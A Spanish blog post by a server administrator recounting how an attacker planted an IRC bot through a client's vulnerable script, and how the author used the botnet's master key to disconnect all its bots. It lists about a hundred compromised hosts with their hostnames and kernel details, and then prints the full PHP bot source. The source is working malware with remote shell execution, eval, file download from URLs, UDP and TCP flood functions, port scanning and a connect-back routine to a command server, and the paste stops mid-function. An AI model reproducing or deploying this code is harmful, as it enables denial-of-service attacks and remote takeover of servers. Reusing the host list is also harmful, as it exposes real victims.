The Revenge of a Juacker.

Hoy en dia los ataques mas comunes de denegacion de servicio se hacen utilizando redes de maquinas zombies, en teste caso voy a listar un curioso caso que me sucedió el dia 09/11/2009 mientras monitoreaba los servidores.

Una mañana como todas, café en mano mirando que sucedia en los equipos notamos la fuga de varios terabytes de ancho de banda, lo cual nos llamo la atencion, investigando encontramos que un cliente nuestro tenia una falla en un scritp el cual permitia adjuntar codigo malisioso remotamente, para la desgracia del atacante no teniamos nada activado con relacion a funciones de shell por ende su ataque era muy muy limitado, sin embargo se las ingenio para correr un irc bot utilizando nuestro apache sin tener acceso a la cuenta en si, incluyendo el codigo del script en cuestion.

Mirando el codigo fuente del bot script encontre la red de irc, solo me basto ingresar para ver el panorama estremecedor, cientos de bots conectados a un canal maestro, buscando pagar con la misma moneda decidi hacer que sus bots se desconectaran, utilizando su propia clave maestra y su comando magico se les deconecto todos y cada uno de ellos de forma masiva, aca dejo la lista de los “apodos” que tenian los bots junto con alguna informacion que detalla de donde vienen los mismos, los relacionados a argentina fueron notificados dejando por notificar a los internacionales.
La red es:

Welcome to the Internet Relay Chat Network, bet0x^away
Your host is rapidspam.sytes.net, running version 1.2.1546
This server was created out 4 2009 at 22:01:43 HodB (Serial # 00-00-00)
rapidspam.sytes.net IRCXPRO1.2 acdefghiknoprstwxyzACEFGIJLPRS abdefghijklmnopqrstuvwxyzACEFIKLMOPT
IRCX CHANTYPES=%#&+ MODES=6 NOQUIT WALLCHOPS NICKLEN=39 MAXCHANNELS=6 SILENCE=55 WATCH=128 are available on this server
14:39 _ _[ Resumen del IRC : sytes.net ]---•
14:39 |-› 95 usuarios (0 +i) en 1 servidores (95 usuarios por servidor)
14:39 |-› 1 canales (95 usuarios por canal)
14:39 |-› 95 clientes en 0 servidores (rapidspam.sytes.net)
14:39 ¯°--------------------------------------------------------------------------------•
14:39 ••• Current local users: 95 Max: 112
14:39 ••• Current global users: 95 Max: 112

Adjunto acá lista de servidores y código fuente del bot.

[A]BotAttack|7622 ----: Linux moon.hostcolor.us 2.6.17-1.2142_FC4 #1 Tue Jul 11 22:41:14 EDT 2006 i686 (safe: on)
[A]BotAttack|3710 ----: Linux 62.149.171.147 2.6.9-023stab051.2-smp #1 SMP Thu Sep 24 22:32:27 MSD 2009 i686 (safe: off)
[A]BotAttack|6411 ----: Linux bces-1510.de 2.6.8-2-686-smp #1 SMP Tue Aug 16 12:08:30 UTC 2005 i686 (safe: on)
[A]BotAttack|4946 ----: Linux 62.149.171.147 2.6.9-023stab051.2-smp #1 SMP Thu Sep 24 22:32:27 MSD 2009 i686 (safe: off)
[A]BotAttack|2581 ----: Linux 62.149.171.147 2.6.9-023stab051.2-smp #1 SMP Thu Sep 24 22:32:27 MSD 2009 i686 (safe: off)
[A]BotAttack|6135 ----: Linux 62.149.171.147 2.6.9-023stab051.2-smp #1 SMP Thu Sep 24 22:32:27 MSD 2009 i686 (safe: off)
[A]BotAttack|7060 ----: Linux 62.149.171.147 2.6.9-023stab051.2-smp #1 SMP Thu Sep 24 22:32:27 MSD 2009 i686 (safe: off)
[A]BotAttack|6986 ----: Linux 62.149.171.147 2.6.9-023stab051.2-smp #1 SMP Thu Sep 24 22:32:27 MSD 2009 i686 (safe: off)
[A]BotAttack|0168 ----: Linux 62.149.171.147 2.6.9-023stab051.2-smp #1 SMP Thu Sep 24 22:32:27 MSD 2009 i686 (safe: off)
[A]BotAttack|6012 ----: Linux web.tfnet.cz 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 (safe: off)
[A]BotAttack|7057 ----: Linux web4 2.6.21.1-1 #2 SMP Mon May 14 08:16:40 CEST 2007 i686 (safe: on)
[A]BotAttack|8853 ----: Linux 62.149.171.147 2.6.9-023stab051.2-smp #1 SMP Thu Sep 24 22:32:27 MSD 2009 i686 (safe: off)
[A]BotAttack|9418 ----: Linux rh73.wnet.cz 2.4.20_42.7.legacy.p2p #2 St kvì 4 00:41:33 CEST 2005 i686 unknown (safe: on)
[A]BotAttack|8187 ----: FreeBSD sv61592.nfrance.com 5.5-RELEASE-p20 FreeBSD 5.5-RELEASE-p20 #0: Thu Aug 27 10:47:00 CEST 2009 root@anemone3.nfrance.com:/usr/obj/usr/src/sys/ANEMONE3SMP i386 (safe: on)
[A]BotAttack|5231 ----: Linux vwp0096 2.6.18.8-xenU-static-i686-uk9 #3 SMP Wed Apr 9 10:51:41 CEST 2008 i686 (safe: off)
[A]BotAttack|2615 ----: Linux web.tfnet.cz 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 (safe: off)
[A]BotAttack|8622 ----: Linux web6 2.6.18-6-amd64 #1 SMP Fri Aug 21 14:53:35 UTC 2009 x86_64 (safe: on)
[A]BotAttack|0729 ----: Linux jade 2.6.18-92.el5 #1 SMP Fri Feb 20 14:39:46 KST 2009 i686 (safe: off)
[A]BotAttack|3685 ----: Linux stripples.devel.redhat.com 2.4.21-1.1931.2.274.entsmp #1 SMP Tue Jun 24 11:18:10 EDT 2003 i686 i686 i386 GNU/Linux (safe: off)
[I]BotAttack|9400 ----: Windows NT CORFLEX-FS 5.0 build 2195 (safe: off)
[A]BotAttack|8541 ----: Linux jade 2.6.18-92.el5 #1 SMP Fri Feb 20 14:39:46 KST 2009 i686 (safe: off)
[A]BotAttack|9778 ----: Linux station05-new 2.6.26-2-amd64 #1 SMP Wed May 13 15:37:46 UTC 2009 x86_64 (safe: on)
[A]BotAttack|1950 ----: FreeBSD arrakis.unlugar.com 4.11-STABLE FreeBSD 4.11-STABLE #0: Fri Nov i386 (safe: on)
[C]BotAttack|4053 ----: Linux pts-linux-lab029.pts-linux.labnet 2.4.19C13_V #1 Fri Feb 20 01:55:03 PST 2004 i686 unknown (safe: off)
[A]BotAttack|8374 ----: Linux hm77 2.6.18-164.el5PAE #1 SMP Tue Aug 18 15:59:11 EDT 2009 i686 (safe: off)
[C]BotAttack|2314 ----: Linux pts-linux-lab029.pts-linux.labnet 2.4.19C13_V #1 Fri Feb 20 01:55:03 PST 2004 i686 unknown (safe: off)
[A]BotAttack|7378 ----: Linux ns20.sbc-dns.com 2.6.9-42.0.10.ELsmp #1 SMP Tue Feb 27 10:11:19 EST 2007 i686 (safe: off)
[A]BotAttack|3427 ----: Linux marte 2.4.36.2 #4 Sat Mar 7 10:55:25 BRT 2009 i686 (safe: off)
[A]BotAttack|7636 ----: Linux access2.thairegister.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:39:21 EDT 2009 i686 (safe: on)
[A]BotAttack|5858 ----: Linux asgard.ows.ch 2.6.12-2.3.legacy_FC3smp #1 SMP Sun Feb 19 08:53:09 EST 2006 i686 (safe: on)
[A]BotAttack|9053 ----: Linux server.creapix.eu 2.6.28.1-xxxx-std-ipv4-32 #2 SMP Fri Jan 30 09:55:02 UTC 2009 i686 (safe: on)
[A]BotAttack|3242 ----: FreeBSD svrweb.utb.tg 5.3-RELEASE FreeBSD 5.3-RELEASE #0: Fri Nov 5 04:19:18 UTC 2004 root@harlow.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386 (safe: off)
[A]BotAttack|8602 ----: Linux srv103.tutorhost.com 2.6.18-53.1.14.el5 #1 SMP Wed Mar 5 11:36:49 EST 2008 i686 (safe: off)
[A]BotAttack|5009 ----: Linux vps114.madeso.nl 2.6.18-028stab064.7 #1 SMP Wed Aug 26 13:11:07 MSD 2009 i686 (safe: on)
[A]BotAttack|4304 ----: Linux hosting1.fastq.com 2.6.18-92.1.22.el5.centos.plus #1 SMP Wed Dec 17 10:50:49 EST 2008 i686 (safe: on)
[A]BotAttack|4095 ----: Linux bces-1510.de 2.6.8-2-686-smp #1 SMP Tue Aug 16 12:08:30 UTC 2005 i686 (safe: on)
[A]BotAttack|6168 ----: (safe: on)
[A]BotAttack|6824 ----: Linux ws4.surf-town.net 2.6.30.5 #1 SMP Wed Aug 19 11:55:34 CEST 2009 i686 (safe: on)
[A]BotAttack|2518 ----: Linux station05-new 2.6.26-2-amd64 #1 SMP Wed May 13 15:37:46 UTC 2009 x86_64 (safe: on)
[A]BotAttack|2924 ----: Linux aplisoft.com 2.6.18-92.1.22.el5.centos.plus #1 SMP Wed Dec 17 10:50:49 EST 2008 i686 (safe: on)
[A]BotAttack|4390 ----: Linux moon.hostcolor.us 2.6.17-1.2142_FC4 #1 Tue Jul 11 22:41:14 EDT 2006 i686 (safe: on)
[A]BotAttack|6021 ----: FreeBSD web09.nic.ru 6.4-RELEASE-p7 FreeBSD 6.4-RELEASE-p7 #7: Sun Oct 4 02:40:13 MSD 2009 root@hdad.nic.ru:/usr/obj/usr/src/sys/HNIC-SMP-ULE-IBM pl#12 i386 (safe: on)
[A]BotAttack|5528 ----: Linux hs-646.dedicated.hostalia.com 2.6.22.7-57.fc6 #1 SMP Fri Sep 21 19:26:56 EDT 2007 i686 (safe: on)
[A]BotAttack|6233 ----: Linux infong 2.4 #1 SMP Tue Dec 18 22:34:10 UTC 2007 i686 GNU/Linux (safe: off)
[A]BotAttack|0806 ----: (safe: on)
[A]BotAttack|5393 ----: FreeBSD radiolab2.phys.spbu.ru 7.2-RELEASE-p4 FreeBSD 7.2-RELEASE-p4 #0: Fri Oct 2 12:21:39 UTC 2009 root@i386-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC i386 (safe: on)
[A]BotAttack|9615 ----: Linux vwp0096 2.6.18.8-xenU-static-i686-uk9 #3 SMP Wed Apr 9 10:51:41 CEST 2008 i686 (safe: off)
[A]BotAttack|9413 ----: Linux vwp0096 2.6.18.8-xenU-static-i686-uk9 #3 SMP Wed Apr 9 10:51:41 CEST 2008 i686 (safe: off)
[A]BotAttack|2994 ----: Linux moon.hostcolor.us 2.6.17-1.2142_FC4 #1 Tue Jul 11 22:41:14 EDT 2006 i686 (safe: on)
[A]BotAttack|7025 ----: Linux server.creapix.eu 2.6.28.1-xxxx-std-ipv4-32 #2 SMP Fri Jan 30 09:55:02 UTC 2009 i686 (safe: on)
[A]BotAttack|4020 ----: Linux perseo.pilar.gov.ar 2.6.12-1.1381_FC3smp #1 SMP Fri Oct 21 04:03:26 EDT 2005 i686 (safe: off)
[A]BotAttack|4027 ----: Linux plesk.groupehytech.net 2.6.9-42.ELsmp #1 SMP Wed Jul 12 23:27:17 EDT 2006 i686 (safe: on)
[A]BotAttack|4403 ----: Linux vs170113.vserver.de 2.6.9-023stab048.5-smp #1 SMP Wed Aug 20 18:58:38 MSD 2008 i686 (safe: on)
[A]BotAttack|2738 ----: Linux web4 2.6.21.1-1 #2 SMP Mon May 14 08:16:40 CEST 2007 i686 (safe: on)
[A]BotAttack|2146 ----: Linux asgard.ows.ch 2.6.12-2.3.legacy_FC3smp #1 SMP Sun Feb 19 08:53:09 EST 2006 i686 (safe: on)
[A]BotAttack|1383 ----: Linux station05-new 2.6.26-2-amd64 #1 SMP Wed May 13 15:37:46 UTC 2009 x86_64 (safe: on)
[A]BotAttack|8967 ----: Linux hosting1.fastq.com 2.6.18-92.1.22.el5.centos.plus #1 SMP Wed Dec 17 10:50:49 EST 2008 i686 (safe: on)
[A]BotAttack|2978 ----: Linux infong 2.4 #1 SMP Tue Dec 18 22:34:10 UTC 2007 i686 GNU/Linux (safe: off)
[A]BotAttack|8205 ----: Linux mutu0094 2.6.26-2-vserver-amd64 #1 SMP Wed Aug 19 23:56:39 UTC 2009 x86_64 (safe: off)
[A]BotAttack|1841 ----: Linux hm77 2.6.18-164.el5PAE #1 SMP Tue Aug 18 15:59:11 EDT 2009 i686 (safe: off)
[A]BotAttack|0813 ----: FreeBSD svrweb.utb.tg 5.3-RELEASE FreeBSD 5.3-RELEASE #0: Fri Nov 5 04:19:18 UTC 2004 root@harlow.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386 (safe: off)
[A]BotAttack|4802 ----: Linux knm12.knm12.com 2.6.11-1.1369_FC4 #1 Thu Jun 2 22:55:56 EDT 2005 i686 (safe: on)
[A]BotAttack|8386 ----: Linux vwp0096 2.6.18.8-xenU-static-i686-uk9 #3 SMP Wed Apr 9 10:51:41 CEST 2008 i686 (safe: off)
[A]BotAttack|4229 ----: Linux vwp0096 2.6.18.8-xenU-static-i686-uk9 #3 SMP Wed Apr 9 10:51:41 CEST 2008 i686 (safe: off)
[A]BotAttack|6852 ----: FreeBSD radiolab2.phys.spbu.ru 7.2-RELEASE-p4 FreeBSD 7.2-RELEASE-p4 #0: Fri Oct 2 12:21:39 UTC 2009 root@i386-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC i386 (safe: on)
[A]BotAttack|8846 ----: Linux web2.ordasnet.cz 2.6.18-92.1.6.el5 #1 SMP Wed Jun 25 13:49:24 EDT 2008 i686 (safe: on)
[A]BotAttack|2992 ----: Linux access2.thairegister.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:39:21 EDT 2009 i686 (safe: on)
[A]BotAttack|5730 ----: Linux s15309148.onlinehome-server.info 2.6.27.24rootserver-20090525a #1 SMP Mon May 25 04:55:37 EDT 2009 x86_64 (safe: on)
[A]BotAttack|5371 ----: Linux tauri 2.6.24.5-smp #2 SMP Wed Apr 30 13:41:38 CDT 2008 i686 (safe: off)
[A]BotAttack|8862 ----: Linux ws4.surf-town.net 2.6.30.5 #1 SMP Wed Aug 19 11:55:34 CEST 2009 i686 (safe: on)
[A]BotAttack|9367 ----: Linux station05-new 2.6.26-2-amd64 #1 SMP Wed May 13 15:37:46 UTC 2009 x86_64 (safe: on)
[A]BotAttack|0692 ----: (safe: off)
[A]BotAttack|6344 ----: FreeBSD web09.nic.ru 6.4-RELEASE-p7 FreeBSD 6.4-RELEASE-p7 #7: Sun Oct 4 02:40:13 MSD 2009 root@hdad.nic.ru:/usr/obj/usr/src/sys/HNIC-SMP-ULE-IBM pl#12 i386 (safe: on)
[A]BotAttack|3939 ----: Linux web07.fangio.net 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:39:21 EDT 2009 i686 (safe: on)
[A]BotAttack|8958 ----: Linux knm12.knm12.com 2.6.11-1.1369_FC4 #1 Thu Jun 2 22:55:56 EDT 2005 i686 (safe: on)
[A]BotAttack|9797 ----: Linux maestrat.net 2.6.18-028stab062.3-ent #1 SMP Thu Mar 26 15:12:05 MSK 2009 i686 (safe: on)
[A]BotAttack|3411 ----: Linux aplisoft.com 2.6.18-92.1.22.el5.centos.plus #1 SMP Wed Dec 17 10:50:49 EST 2008 i686 (safe: on)
[A]BotAttack|5182 ----: Linux brsp7 2.6.22.8 #1 SMP Tue Sep 25 16:27:00 BRT 2007 i686 (safe: off)
[A]BotAttack|6274 ----: Linux s15309148.onlinehome-server.info 2.6.27.24rootserver-20090525a #1 SMP Mon May 25 04:55:37 EDT 2009 x86_64 (safe: on)
[A]BotAttack|0975 ----: Linux station05-new 2.6.26-2-amd64 #1 SMP Wed May 13 15:37:46 UTC 2009 x86_64 (safe: on)
[A]BotAttack|7523 ----: Linux 62.149.171.147 2.6.9-023stab051.2-smp #1 SMP Thu Sep 24 22:32:27 MSD 2009 i686 (safe: off)
[A]BotAttack|5744 ----: Linux marte 2.4.36.2 #4 Sat Mar 7 10:55:25 BRT 2009 i686 (safe: off)
[A]BotAttack|7036 ----: Linux h1246 2.4.29 #3 SMP Tue Feb 15 01:47:49 CET 2005 i686 (safe: on)
[A]BotAttack|2030 ----: Linux cyber-hebergement.eu 2.6.27.24rootserver-20090525a #1 SMP Mon May 25 04:55:37 EDT 2009 x86_64 (safe: on)
[A]BotAttack|1838 ----: Linux cyber-hebergement.eu 2.6.27.24rootserver-20090525a #1 SMP Mon May 25 04:55:37 EDT 2009 x86_64 (safe: on)
[A]BotAttack|1258 ----: Linux web6 2.6.18-6-amd64 #1 SMP Fri Aug 21 14:53:35 UTC 2009 x86_64 (safe: on)
[A]BotAttack|8098 ----: Linux hs-646.dedicated.hostalia.com 2.6.22.7-57.fc6 #1 SMP Fri Sep 21 19:26:56 EDT 2007 i686 (safe: on)
[A]BotAttack|0926 ----: SunOS hook 5.10 Generic_138889-03 i86pc (safe: on)
[A]BotAttack|5077 ----: Linux vs170113.vserver.de 2.6.9-023stab048.5-smp #1 SMP Wed Aug 20 18:58:38 MSD 2008 i686 (safe: on)
[A]BotAttack|3143 ----: Linux plesk.groupehytech.net 2.6.9-42.ELsmp #1 SMP Wed Jul 12 23:27:17 EDT 2006 i686 (safe: on)
[A]BotAttack|3175 ----: Windows NT PROXI 5.1 build 2600 (safe: off)
[A]BotAttack|5708 ----: Linux brsp7 2.6.22.8 #1 SMP Tue Sep 25 16:27:00 BRT 2007 i686 (safe: off)

<?

/*
*
* #crew@corp. since 2003
* edited by: devil__ and MEIAFASE <admin@xdevil.org> <meiafase@pucorp.org>
* Friend: LP <fuckerboy@sercret.gov>
* COMMANDS:
*
* .user <password> //login to the bot
* .logout //logout of the bot
* .die //kill the bot
* .restart //restart the bot
* .mail <to> <from> <subject> <msg> //send an email
* .dns <IP|HOST> //dns lookup
* .download <URL> <filename> //download a file
* .exec <cmd> // uses exec() //execute a command
* .sexec <cmd> // uses shell_exec() //execute a command
* .cmd <cmd> // uses popen() //execute a command
* .info //get system information
* .php <php code> // uses eval() //execute php code
* .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
* .udpflood <target> <packets> <packetsize> <delay> //udpflood attack
* .raw <cmd> //raw IRC command
* .rndnick //change nickname
* .pscan <host> <port> //port scan
* .safe // test safe_mode (dvl)
* .inbox <to> // test inbox (dvl)
* .conback <ip> <port> // conect back (dvl)
* .uname // return shell's uname using a php function (dvl)
*
*/

set_time_limit(0);
error_reporting(0);
echo "ok!";

class pBot
{
var $config = array("server"=>"nicksom2d.no-ip.info",
"port"=>"6667",
"pass"=>"masterkey",
"prefix"=>"BotAttack|",
"maxrand"=>"4",
"chan"=>"#pBots",
"chan2"=>"#bpBots",
"key"=>"masterkey",
"modes"=>"+s",
"password"=>"xy",
"trigger"=>".",
"hostauth"=>"*" // * for any hostname (remember: /setvhost pucorp.org)
);
var $users = array();
function start()
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
$this->start();
$ident = $this->config['prefix'];
$alph = range("0","9");
for($i=0;$i<$this->config['maxrand'];$i++)
$ident .= $alph[rand(0,9)];
if(strlen($this->config['pass'])>0)
$this->send("PASS ".$this->config['pass']);
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
$this->set_nick();
$this->main();
}
function main()
{
while(!feof($this->conn))
{
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :")
{
$this->send("PONG :".substr($this->buf,6));
}
if(isset($cmd[1]) && $cmd[1] =="001")
{
$this->send("MODE ".$this->nick." ".$this->config['modes']);
$this->join($this->config['chan'],$this->config['key']);
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan2'],"[\2uname!\2]: $uname (safe: $safemode)");
$this->privmsg($this->config['chan2'],"[\2vuln!\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
}
if(isset($cmd[1]) && $cmd[1]=="433")
{
$this->set_nick();
}
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick)
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i+1];
}
else
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i];
}
if(count($cmd)>2)
{
switch($cmd[1])
{
case "QUIT":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PART":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PRIVMSG":
if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*"))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "user":
if($mcmd[1]==$this->config['password'])
{
$this->log_in($host);
}
else
{
$this->notice($this->config['chan'],"[\2Auth\2]: Senha errada $nick idiota!!");
}
break;
}
}
}
elseif($this->is_logged_in($host))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "restart":
$this->send("QUIT :restart commando from $nick");
fclose($this->conn);
$this->start();
break;
case "mail": //mail to from subject message
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Impossivel mandar e-mail.");
}
else
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2");
}
}
break;
case "safe":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = "on";
}
else {
$safemode = "off";
}
$this->privmsg($this->config['chan'],"[\2safe mode\2]: ".$safemode."");
break;
case "inbox": //teste inbox
if(isset($mcmd[1]))
{
$token = md5(uniqid(rand(), true));
$header = "From: <inbox".$token."@xdevil.org>";
$a = php_uname();
$b = getenv("SERVER_SOFTWARE");
$c = gethostbyname($_SERVER["HTTP_HOST"]);
if(!mail($mcmd[1],"InBox Test","#crew@corp. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\n\ngreetz: wicked\nby: dvl <admin@xdevil.org>",$header))
{
$this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");
}
else
{
$this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");
}
}
break;
case "conback":
if(count($mcmd)>2)
{
$this->conback($mcmd[1],$mcmd[2]);
}
break;
case "dns":
if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
}
}
break;
case "info":
case "vunl":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
$this->privmsg($this->config['chan'],"[\2vuln\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
break;
case "bot":
$this->privmsg($this->config['chan'],"[\2bot\2]: phpbot 2.0 by; #crew@corp.");
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
break;
case "rndnick":
$this->set_nick();
break;
case "raw":
$this->send(strstr($msg,$mcmd[1]));
break;
case "eval":
$eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
break;
case "sexec":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = shell_exec($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;

case "exec":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = exec($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;

case "passthru":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = passthru($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;

case "popen":
if(isset($mcmd[1]))
{
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$this->privmsg($this->config['chan'],"[\2popen\2]: $command");
$pipe = popen($command,"r");
while(!feof($pipe))
{
$pbuf = trim(fgets($pipe,512));
if($pbuf != NULL)
$this->privmsg($this->config['chan']," : $pbuf");
}
pclose($pipe);
}

case "system":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = system($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;

case "pscan": // .pscan 127.0.0.1 6667
if(count($mcmd) > 2)
{
if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
else
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
}
break;
case "ud.server": // .ud.server <server> <port> [password]
if(count($mcmd)>2)
{
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if(isset($mcmcd[3]))
{
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]." Senha: ".$mcmd[3]);
}
else
{
$this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]);
}
}
break;
case "download":
if(count($mcmd) > 2)
{
if(!$fp = fopen($mcmd[2],"w"))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download. Permissao negada.");
}
else
{
if(!$get = file($mcmd[1]))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download de \2".$mcmd[1]."\2");
}
else
{
for($i=0;$i<=count($get);$i++)
{
fwrite($fp,$get[$i]);
}
$this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2");
}
fclose($fp);
}
}
else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }
break;
case "die":
$this->send("QUIT :die command from $nick");
fclose($this->conn);
exit;
case "logout":
$this->log_out($host);
$this->privmsg($this->config['chan'],"[\2auth\2]: $nick deslogado!");
break;
case "udpflood":
if(count($mcmd)>3)
{
$this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
}
break;
case "tcpflood":
if(count($mcmd)>5)
{
$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
}
break;
}
}
}
break;
}
}
}
$old_buf = $this->buf;
}
$this->start();
}
function send($msg)
{
fwrite($this->conn,"$msg\r\n");

}
function join($chan,$key=NULL)
{
$this->send("JOIN $chan $key");
}
function privmsg($to,$msg)
{
$this->send("PRIVMSG $to :$msg");
}
function notice($to,$msg)
{
$this->send("NOTICE $to :$msg");
}
function is_logged_in($host)
{
if(isset($this->users[$host]))
return 1;
else
return 0;
}
function log_in($host)
{
$this->users[$host] = true;
}
function log_out($host)
{
unset($this->users[$host]);
}
function set_nick()
{
if(isset($_SERVER['SERVER_SOFTWARE']))
{
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache"))
$this->nick = "[A]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis"))
$this->nick = "[I]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami"))
$this->nick = "[X]";
else
$this->nick = "[U]";
}
else
{
$this->nick = "[C]";
}
$this->nick .= $this->config['prefix'];
for($i=0;$i<$this->config['maxrand'];$i++)
$this->nick .= mt_rand(0,9);
$this->send("NICK ".$this->nick);
}
function udpflood($host,$packetsize,$time) {
$this->privmsg($this->config['chan'],"[\2UdpFlood Started!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
$timei = time();
$i = 0;
while(time()-$timei < $time) {
$fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
fwrite($fp,$packet);
fclose($fp);
$i++;
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2UdpFlood Finished!\2]: $env MB enviados / Media: $vel MB/s ");
}
function tcpflood($host,$packets,$packetsize,$port,$delay)
{
$this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++)
$packet .= chr(mt_rand(1,256));
for($i=0;$i<$packets;$i++)
{
if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
{
$this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>");
return 0;
}
else
{
fwrite($fp,$packet);
fclose($fp);
}
sleep($delay);
}
$this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port.");
}
function conback($ip,$port)
{
$this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando a $ip:$port");
